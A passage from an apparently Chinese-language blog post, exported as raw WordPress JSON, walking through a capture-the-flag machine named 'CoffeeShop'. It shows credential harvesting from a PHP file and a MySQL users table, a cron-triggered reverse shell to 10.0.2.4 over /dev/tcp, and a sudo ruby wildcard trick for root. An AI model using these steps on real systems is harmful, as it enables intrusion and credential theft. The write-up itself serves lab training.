\/etc\/cron.hourly: Is a directory\ncat: \/etc\/cron.monthly: Is a directory\n# \/etc\/crontab: system-wide crontab\n# Unlike any other crontab you don't have to run the `crontab'\n# command to install the new version when you edit this file\n# and files in \/etc\/cron.d. These files also have username fields,\n# that none of the other crontabs do.\n\nSHELL=\/bin\/sh\n# You can also override PATH, but by default, newer versions inherit it from the environment\n#PATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin\n\n# Example of job definition:\n# .---------------- minute (0 - 59)\n# | .------------- hour (0 - 23)\n# | | .---------- day of month (1 - 31)\n# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...\n# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat\n# | | | | |\n# * * * * * user-name command to be executed\n17 * * * * root cd \/ && run-parts --report \/etc\/cron.hourly\n25 6 * * * root test -x \/usr\/sbin\/anacron || ( cd \/ && run-parts --report \/etc\/cron.daily )\n47 6 * * 7 root test -x \/usr\/sbin\/anacron || ( cd \/ && run-parts --report \/etc\/cron.weekly )\n52 6 1 * * root test -x \/usr\/sbin\/anacron || ( cd \/ && run-parts --report \/etc\/cron.monthly )\n#\n* * * * * \/bin\/bash \/home\/shopadmin\/execute.sh\n\ncat: \/etc\/cron.weekly: Is a directory\ntuna@coffee-shop:~$ find \/ -perm -u=s -type f 2>\/dev\/null\n\/snap\/snapd\/21184\/usr\/lib\/snapd\/snap-confine\n\/snap\/snapd\/20290\/usr\/lib\/snapd\/snap-confine\n\/snap\/core20\/1974\/usr\/bin\/chfn\n\/snap\/core20\/1974\/usr\/bin\/chsh\n\/snap\/core20\/1974\/usr\/bin\/gpasswd\n\/snap\/core20\/1974\/usr\/bin\/mount\n\/snap\/core20\/1974\/usr\/bin\/newgrp\n\/snap\/core20\/1974\/usr\/bin\/passwd\n\/snap\/core20\/1974\/usr\/bin\/su\n\/snap\/core20\/1974\/usr\/bin\/sudo\n\/snap\/core20\/1974\/usr\/bin\/umount\n\/snap\/core20\/1974\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/snap\/core20\/1974\/usr\/lib\/openssh\/ssh-keysign\n\/snap\/core20\/2105\/usr\/bin\/chfn\n\/snap\/core20\/2105\/usr\/bin\/chsh\n\/snap\/core20\/2105\/usr\/bin\/gpasswd\n\/snap\/core20\/2105\/usr\/bin\/mount\n\/snap\/core20\/2105\/usr\/bin\/newgrp\n\/snap\/core20\/2105\/usr\/bin\/passwd\n\/snap\/core20\/2105\/usr\/bin\/su\n\/snap\/core20\/2105\/usr\/bin\/sudo\n\/snap\/core20\/2105\/usr\/bin\/umount\n\/snap\/core20\/2105\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/snap\/core20\/2105\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/snapd\/snap-confine\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/bin\/gpasswd\n\/usr\/bin\/su\n\/usr\/bin\/chfn\n\/usr\/bin\/newgrp\n\/usr\/bin\/sudo\n\/usr\/bin\/chsh\n\/usr\/bin\/passwd\n\/usr\/bin\/umount\n\/usr\/bin\/pkexec\n\/usr\/bin\/fusermount3\n\/usr\/bin\/mount\n\/usr\/libexec\/polkit-agent-helper-1\ntuna@coffee-shop:~$ echo $PATH\n\/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin:\/usr\/games:\/usr\/local\/games:\/snap\/bin\ntuna@coffee-shop:~$ pwd\n\/home\/tuna\ntuna@coffee-shop:~$ ls -la\ntotal 40\ndrwxr-x--- 3 tuna tuna 4096 Jan 3 18:49 .\ndrwxr-xr-x 5 root root 4096 Jan 3 17:12 ..\n-rw------- 1 tuna tuna 839 Jan 3 18:40 .bash_history\n-rw-r--r-- 1 tuna tuna 220 Jan 3 17:12 .bash_logout\n-rw-r--r-- 1 tuna tuna 3771 Jan 3 17:12 .bashrc\ndrwx------ 2 tuna tuna 4096 Jan 3 18:49 .cache\n-rw-r--r-- 1 tuna tuna 807 Jan 3 17:12 .profile\n-rw------- 1 tuna tuna 8410 Jan 3 18:28 .viminfo\ntuna@coffee-shop:~$ head .bash_history \nls\ntouch coffee_list.txt\nvim coffee_list.txt \nhead coffee_list.txt \nvim coffee_list.txt \nmv coffee_list.txt unavailable.txt\nls\nhead unavailable.txt \ntail unavailable.txt \nmv unavailable.txt available.txt\ntuna@coffee-shop:~$ tail .bash_history \nls\ncat \/home\/shopadmin\/\ncat \/home\/shopadmin\/execute.sh\nexit\ncat \/home\/shopadmin\/execute.sh\nexit\ncat \/home\/shopadmin\/execute.sh\ncd\nls\nexit\ntuna@coffee-shop:~$ cd \/var\/www\/html\ntuna@coffee-shop:\/var\/www\/html$ ls -la\ntotal 20\ndrwxr-xr-x 4 root root 4096 Jan 3 16:51 .\ndrwxr-xr-x 3 root root 4096 Jan 3 14:10 ..\n-rw-r--r-- 1 root root 1690 Jan 3 16:51 index.html\ndrwxr-xr-x 3 root root 4096 Jan 3 18:49 shop\ndrwxr-xr-x 3 root root 4096 Jan 3 16:34 subdomaindeveloperdirectoryuwu\ntuna@coffee-shop:\/var\/www\/html$ cd shop\ntuna@coffee-shop:\/var\/www\/html\/shop$ ls -la\ntotal 24\ndrwxr-xr-x 3 root root 4096 Jan 3 18:49 .\ndrwxr-xr-x 4 root root 4096 Jan 3 16:51 ..\n-rw-r--r-- 1 root root 1754 Jan 3 18:49 dashboard.php\n-rw-r--r-- 1 root root 2577 Jan 3 16:47 index.html\n-rw-r--r-- 1 root root 2970 Jan 3 17:02 login.php\ndrwxr-xr-x 2 root root 4096 Jan 3 16:46 stylesheet\ntuna@coffee-shop:\/var\/www\/html\/shop$ cat login.php\n<?php\nini_set('display_errors', 1);\nini_set('display_startup_errors', 1);\nerror_reporting(E_ALL);\n\nsession_start();\n\n$host = 'localhost';\n$username = 'shopadmin';\n$password = '1_4m_4dmin';\n$database = 'midnightcoffee';<\/code><\/pre>\nmysql\u4fe1\u606f\u641c\u96c6<\/h3>\n
\u5c1d\u8bd5\u5207\u6362\u7528\u6237<\/p>\n
su shopadmin\n1_4m_4dmin\n# su: Authentication failure<\/code><\/pre>\nmysql\u770b\u4e00\u4e0b\u76f8\u5173\u4fe1\u606f\uff1a<\/p>\n
mysql -u shopadmin -p<\/code><\/pre>\nmysql> show databases;\n+--------------------+\n| Database |\n+--------------------+\n| information_schema |\n| midnightcoffee |\n| mysql |\n| performance_schema |\n| sys |\n+--------------------+\n5 rows in set (0.00 sec)\n\nmysql> use midnightcoffee;\nReading table information for completion of table and column names\nYou can turn off this feature to get a quicker startup with -A\n\nDatabase changed\nmysql> show tables;\n+--------------------------+\n| Tables_in_midnightcoffee |\n+--------------------------+\n| users |\n+--------------------------+\n1 row in set (0.00 sec)\n\nmysql> select * from users;\n+----+-----------+--------------------------------------------------------------+----------------------------------+\n| id | username | password | auth_token |\n+----+-----------+--------------------------------------------------------------+----------------------------------+\n| 1 | shopadmin | $2a$12$yqH60OJyTqoPHXe1g1cGDu93me1v.wGcEEZV5rLy39stUJO.Xsjwi | NULL |\n| 2 | tuna | 1L0v3_TuN4_Very_Much | NULL |\n| 3 | developer | developer | 5b290480bcbaec662aa8531cbc6da4fc |\n+----+-----------+--------------------------------------------------------------+----------------------------------+\n3 rows in set (0.00 sec)<\/code><\/pre>\n\u6211\u64e6\uff0c\u6ca1\u5565\u7528\u3002\u3002\u3002<\/p>\n
\u5b9a\u65f6\u4efb\u52a1+\u53cd\u5f39shell<\/h3>\n
\u5b9a\u65f6\u4efb\u52a1\u626b\u5230\u4e00\u4e2a\u5185\u5bb9\uff1a<\/p>\n
\/home\/shopadmin\/execute.sh<\/code><\/pre>\n\u67e5\u770b\u4e00\u4e0b\u76f8\u5173\u5185\u5bb9\uff1a<\/p>\n
#!\/bin\/bash\n\n\/bin\/bash \/tmp\/*.sh<\/code><\/pre>\n\u554a\uff0c\u8fd9\uff0c\u5728tmp<\/code>\u521b\u5efa\u4e00\u4e2a.sh<\/code>\u811a\u672c\uff0c\u811a\u672c\u5185\u5bb9\u662f\u5c1d\u8bd5\u53cd\u5f39\u4e00\u4e2ashell\uff1a<\/p>\n# tuna\ncd \/tmp;\necho "bash -c 'exec bash -i &>\/dev\/tcp\/10.0.2.4\/1234 <&1'" > exp.sh\n\n# kali\npwncat-cs -lp 1234<\/code><\/pre>\n<\/div><\/p>\n\u4fe1\u606f\u641c\u96c6<\/h3>\nsudo -l\nMatching Defaults entries for shopadmin on coffee-shop:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin,\n use_pty\n\nUser shopadmin may run the following commands on coffee-shop:\n (root) NOPASSWD: \/usr\/bin\/ruby * \/opt\/shop.rb<\/code><\/pre>\n\u725b\u86d9\uff0cruby\u662froot\u6743\u9650\uff01<\/p>\n
\u67e5\u770b\u4e00\u4e0b\uff1a<\/p>\n
cat \/opt\/shop.rb\nputs "C0FF33 SHOPS R L33T"<\/code><\/pre>\n\u770b\u5230\u54ea\u4e2a*<\/code>\u4e86\u5417\uff0c\u8fd9\u8868\u660e\u53ef\u4ee5\u5728\u4e2d\u95f4\u6dfb\u52a0\u4efb\u610f\u5b57\u7b26\uff1a<\/p>\necho "system '\/bin\/bash'" > \/tmp\/fuck.rb\nsudo \/usr\/bin\/ruby \/tmp\/fuck.rb \/opt\/shop.rb<\/code><\/pre>\n\u7136\u540e\u5c31\u83b7\u5f97\u4e86root\uff01<\/p>\n
sudo \/usr\/bin\/ruby \/tmp\/fuck.rb \/opt\/shop.rb\nroot@coffee-shop:\/home\/shopadmin# whoami;id\nroot\nuid=0(root) gid=0(root) groups=0(root)\nroot@coffee-shop:\/home\/shopadmin# cd \/root;ls -la\ntotal 64\ndrwx------ 6 root root 4096 Feb 3 10:31 .\ndrwxr-xr-x 19 root root 4096 Jan 3 13:36 ..\n-rw------- 1 root root 4345 Feb 3 10:32 .bash_history\n-rw-r--r-- 1 root root 3106 Oct 15 2021 .bashrc\ndrwx------ 2 root root 4096 Jan 3 18:40 .cache\n-rw------- 1 root root 20 Jan 3 18:20 .lesshst\ndrwxr-xr-x 3 root root 4096 Jan 3 13:45 .local\n-rw------- 1 root root 1539 Jan 3 17:08 .mysql_history\n-rw-r--r-- 1 root root 161 Jul 9 2019 .profile\n-rw-r--r-- 1 root root 25 Feb 3 10:31 root.txt\ndrwx------ 3 root root 4096 Jan 3 13:37 snap\ndrwx------ 2 root root 4096 Jan 3 13:37 .ssh\n-rw-r--r-- 1 root root 0 Jan 3 14:12 .sudo_as_admin_successful\n-rw------- 1 root root 9874 Feb 3 10:31 .viminfo\nroot@coffee-shop:~# cat root.txt\nC4FF3331N-ADD1CCCTIONNNN\nroot@coffee-shop:~# cd \/home;ls\nmrmidnight shopadmin tuna\nroot@coffee-shop:\/home# cd tuna;ls\nroot@coffee-shop:\/home\/tuna# cd ..\nroot@coffee-shop:\/home# cd shopadmin\/;ls\nexecute.sh user.txt\nroot@coffee-shop:\/home\/shopadmin# cat user.txt\nDR1NK1NG-C0FF33-4T-N1GHT<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"CoffeeShop \u626b\u63cf\u4e00\u4e0b\uff1a \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf sudo nmap -sS -p 1-65535 10. […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-481","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/481","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=481"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/481\/revisions"}],"predecessor-version":[{"id":482,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/481\/revisions\/482"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=481"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=481"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=481"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
![\"image-20240401124015785\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404011325638.png\")
<\/div><\/p>\n![\"image-20240401124110200\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404011325639.png\")
<\/div><\/p>\n![\"image-20240401124143710\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404011325640.png\")
<\/div><\/p>\n![\"image-20240401124203592\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404011325641.png\")
<\/div><\/p>\n![\"image-20240401124831108\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404011325642.png\")
<\/div><\/p>\n![\"image-20240401125523410\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404011325643.png\")
<\/div><\/p>\n![\"image-20240401125722241\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404011325644.png\")
<\/div><\/p>\n![\"image-20240401125815772\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404011325645.png\")
<\/div><\/p>\n![\"image-20240401125939986\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404011325646.png\")
<\/div><\/p>\n![\"image-20240401131521143\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404011325647.png\")
<\/div><\/p>\n